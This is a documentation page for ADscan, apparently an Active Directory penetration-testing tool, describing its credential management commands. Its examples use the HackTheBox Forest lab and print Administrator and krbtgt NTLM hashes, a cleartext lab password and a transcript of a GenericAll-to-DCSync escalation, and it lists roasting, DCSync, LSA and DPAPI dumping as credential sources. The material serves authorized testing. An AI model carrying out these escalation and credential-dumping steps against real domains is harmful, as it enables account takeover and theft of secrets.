🔐 Credential Management
Manage and utilize discovered Active Directory credentials
ADscan automatically discovers and stores credentials during enumeration and exploitation. Use these commands to view and work with discovered credentials.
Commands
creds show
Display all discovered credentials in the current workspace.
Syntax:
creds show
Example (Forest workspace):
(ADscan:htb_forest ~/.adscan/workspaces/htb_forest) > creds show
╭────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ Credentials for domain htb.local │
│ ╭──────────────────────┬──────────────┬──────────────────────────────────┬────────────────────────────┬────────────────────────────╮ │
│ │ User │ Domain │ Credential │ Source │ Notes │ │
│ ├──────────────────────┼──────────────┼──────────────────────────────────┼────────────────────────────┼────────────────────────────┤ │
│ │ Administrator │ htb.local │ 32693b11e6aa90eb43d32c72a07ceea6 │ DCSync │ Domain Admin │ │
│ │ krbtgt │ htb.local │ 819af826bb148e603acb0f33d17632f8 │ DCSync │ KRBTGT account │ │
│ │ $331000-VK4ADACQNUCA │ htb.local │ 31d6cfe0d16ae931b73c59d7e0c089c0 │ DCSync │ Disabled computer account │ │
│ │ sebastien │ htb.local │ Ob********bi │ DCSync / Password cracking │ Masked cleartext password │ │
│ │ lucinda │ htb.local │ Th***************0l │ DCSync / Password cracking │ Masked cleartext password │ │
│ │ svc-alfresco │ htb.local │ s3***ce │ AS-REP Roasting │ Masked cleartext password │ │
│ │ andy │ htb.local │ 29dfccaf39618ff101de5165b19d524b │ DCSync │ User NTLM hash │ │
│ │ mark │ htb.local │ 9e63ebcb217bf3c6b27056fdcb6150f7 │ DCSync │ User NTLM hash │ │
│ │ santi │ htb.local │ pl*******hb │ DCSync / Password cracking │ Masked cleartext password │ │
│ ╰──────────────────────┴──────────────┴──────────────────────────────────┴────────────────────────────┴────────────────────────────╯ │
╰────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
What it shows:
- All discovered usernames
- Associated domains
- Cleartext passwords (when cracked)
- NTLM hashes
- Source of credential discovery (AS-REP roasting, Kerberoasting, DCSync, etc.)
creds select
Select a specific credential to use for further enumeration and exploitation.
Syntax:
creds select <domain>
Parameters:
domain: The domain name of the credentials to select
Example (Forest workspace):
(ADscan:htb_forest ~/.adscan/workspaces/htb_forest) > creds select htb.local
? Select credential for domain htb.local:
1) svc-alfresco@s3***ce (AS-REP Roasting)
2) Administrator@32693b11e6aa90eb43d32c72a07ceea6 (DCSync)
3) sebastien@Ob********bi (DCSync / cracked)
4) lucinda@Th***************0l (DCSync / cracked)
5) santi@pl*******hb (DCSync / cracked)
Select an option (1-5): 2
✓ Selected credential: [email protected]
ℹ Subsequent authenticated enumeration will use this account.
What it does: When you select credentials, ADscan will:
- Show available credentials for the specified domain
- Allow you to choose which credential to use
- Enumerate privileges and access for the selected user:
  - Accessible SMB shares
  - ACL permissions
  - Group memberships
  - Special privileges
  - Attack steps and paths (BloodHound-backed where available)
Use cases:
- Switch between different compromised accounts
- Test access levels of different users
- Enumerate lateral movement opportunities
- Identify privilege escalation paths
creds save
Add a credential manually to continue an existing campaign.
Syntax:
creds save <domain> <username> <password_or_hash> [host] [service]
Alias also supported:
creds add <domain> <username> <password_or_hash> [host] [service]
Important workflow rule:
- Initialize the domain first with start_auth.
- Use creds save afterwards to add extra credentials you found outside ADscan.
If the domain is not initialized in the current workspace, ADscan will block the save and guide you to run start_auth first.
Examples:
# 1) Initialize domain context first
start_auth
# 2) Later, add an additional domain credential
creds save htb.local svc-backup 'Winter2026!'
# 3) Optional local credential (host + service)
creds save htb.local administrator 'P@ssw0rd!' dc01.htb.local smb
Owned users and attack paths
In ADscan, “owned users” are users with a verified credential stored in the workspace. Once you have owned users, you can search for escalation chains from those entry points:
attack_paths <domain> owned
attack_steps <domain>
This is especially useful after password spraying, roasting, or any technique that adds new valid credentials. See Attack Paths & Steps for the full workflow.
System Command
system
Execute shell commands in the environment where ADscan is running.
Syntax:
system <command>
Parameters:
command: Any shell command to execute locally
Examples:
# Check local user
(ADscan:workspace) > system whoami
kali
# View network interfaces
(ADscan:workspace) > system ip addr show
# Check VPN connection
(ADscan:workspace) > system ping -c 1 10.10.10.161
Important Notes:
- By default, ADscan runs inside Docker, so system executes inside the ADscan container (with host networking)
- system does NOT execute commands on the target domain
- Useful for checking local system state, files, and network connectivity
- All standard Linux/bash commands are available
Docker Mode Note
If you need to run commands on the host (for example docker ps), use a separate terminal on the host OS.
Common Use Cases:
# Verify VPN connectivity
system ping <target_ip>
# Check available disk space
system df -h
# Check network routes
system ip route
# Verify tool installations
system which hashcat
To inspect workspace files on the host, use a separate terminal:
ls -la ~/.adscan/workspaces/
cp ~/.adscan/workspaces/<workspace>/report.json /tmp/
Credential Storage
Credentials are automatically saved as part of the workspace state:
~/.adscan/workspaces/<workspace>/
├── variables.json # Structured state: domains, credentials, services, config
└── report.json # JSON report of discovered issues and attack paths
Security:
- variables.json contains discovered credentials (including cleartext passwords and hashes)
- Files should have restrictive permissions (600)
- Cleartext passwords are only stored when explicitly cracked
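The permission rule above can be checked and enforced from a host terminal. This is an added example, not part of ADscan: the function names and the ADSCAN_WS_ROOT variable are hypothetical, and the default root is the workspace path shown on this page.

```shell
#!/bin/sh
# Added example (not ADscan code): audit and tighten permissions on ADscan
# workspace state. ADSCAN_WS_ROOT is a hypothetical override variable; the
# default is the workspace path documented on this page.
ADSCAN_WS_ROOT="${ADSCAN_WS_ROOT:-$HOME/.adscan/workspaces}"

# Print every file or directory under the root that grants any access to
# group or other. POSIX find has no "any of these bits" test, so each
# permission bit is checked separately.
audit_workspace_perms() {
    root="${1:-$ADSCAN_WS_ROOT}"
    [ -d "$root" ] || { echo "no such workspace root: $root" >&2; return 2; }
    find "$root" \( -type f -o -type d \) \
        \( -perm -040 -o -perm -020 -o -perm -010 \
           -o -perm -004 -o -perm -002 -o -perm -001 \) -print
}

# Number of findings; 0 means nothing is accessible beyond the owner.
count_loose_perms() {
    audit_workspace_perms "$1" | wc -l | tr -d ' '
}

# Owner-only access: directories 700, regular files 600 (variables.json,
# report.json and anything else stored in the workspace).
harden_workspace_perms() {
    root="${1:-$ADSCAN_WS_ROOT}"
    [ -d "$root" ] || return 2
    find "$root" -type d -exec chmod 700 {} +
    find "$root" -type f -exec chmod 600 {} +
}
```

Run audit_workspace_perms before archiving or copying a workspace, and harden_workspace_perms if it prints anything.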
Credential Sources
ADscan discovers credentials through various techniques:
| Technique | Description | Output |
|---|---|---|
| AS-REP Roasting | Pre-authentication disabled accounts | Password (cracked hash) |
| Kerberoasting | Service accounts with SPNs | Password (cracked TGS) |
| DCSync | Domain replication rights | NTLM hashes (all users) |
| SAM Dump | Local account database | NTLM hashes (local users) |
| LSA Secrets | LSA cached credentials | Passwords or hashes |
| DPAPI | Data Protection API credentials | Passwords (decrypted) |
Workflow Example
Complete credential management workflow (Forest example):
You can run start_auth in guided mode and enter the target details when prompted:
- Domain: htb.local
- DC IP: 10.129.2.124
- Username: svc-alfresco
- Password: s3rvice
(ADscan:htb_forest ~/.adscan/workspaces/htb_forest) > start_auth
If you prefer to skip the guided prompts, you can also run:
(ADscan:workspace) > start_auth htb.local 10.129.2.124 svc-alfresco s3rvice
[+] Credentials validated successfully for [email protected]
ℹ Enumerating domain privileges and ACLs for user svc-alfresco
⚠ There is an ACE with GenericAll on 'Exchange Windows Permissions'
Do you want to exploit the GenericAll/GenericWrite privilege on Exchange Windows Permissions? [y/n] (y): y
ℹ Executing AddSelf attack
✓ User svc-alfresco successfully added to group Exchange Windows Permissions
ℹ Adding DCSync permissions to user svc-alfresco on the domain domain
✓ GenericAll added successfully
ℹ Performing DCSync for user Administrator
✓ Found credential: htb.local/Administrator with hash 32693b11e6aa90eb43d32c72a07ceea6
(ADscan:htb_forest ~/.adscan/workspaces/htb_forest) > creds show
[...same output as above 'Discovered Credentials (Forest)' example...]
(ADscan:htb_forest ~/.adscan/workspaces/htb_forest) > creds select htb.local
? Select credential for domain htb.local:
1) svc-alfresco@s3***ce (AS-REP Roasting)
2) Administrator@32693b11e6aa90eb43d32c72a07ceea6 (DCSync)
3) sebastien@Ob********bi
4) lucinda@Th***************0l
5) santi@pl*******hb
Select an option (1-5): 2
✓ Selected credential: [email protected]
ℹ Subsequent authenticated enumeration will use this account.
# On the host (separate terminal)
ls ~/.adscan/workspaces/htb_forest/
Best Practices
Credential Rotation
When you discover new credentials:
- Use creds show to view all accounts
- Test each credential with creds select
- Document which accounts have which access
- Prioritize high-privilege accounts for further exploitation
Secure Storage
- Never share variables.json publicly
- Encrypt workspace backups before transferring
- Delete old workspaces after engagement completion
- Use clear_all to wipe workspace data when done
Sensitive Data Protection
The variables.json file contains cleartext passwords and NTLM hashes. Always protect this file with restrictive permissions (600), encrypt backups before transfer, and securely delete workspace data after engagement completion using clear_all.
Credential Testing
# Select different credentials to test access
creds select corp.local # Test user1
creds select corp.local # Test user2
# Compare access levels between accounts
# Identify which accounts have DA/EA privileges
Related Commands
- Scanning Commands - Discover credentials through scanning
- Workspace Management - Manage workspace data
Next Steps
After discovering credentials:
- Use creds show to view all credentials
- Select high-value credentials with creds select
- Enumerate privileges and accessible resources
- Follow BloodHound attack paths to escalate privileges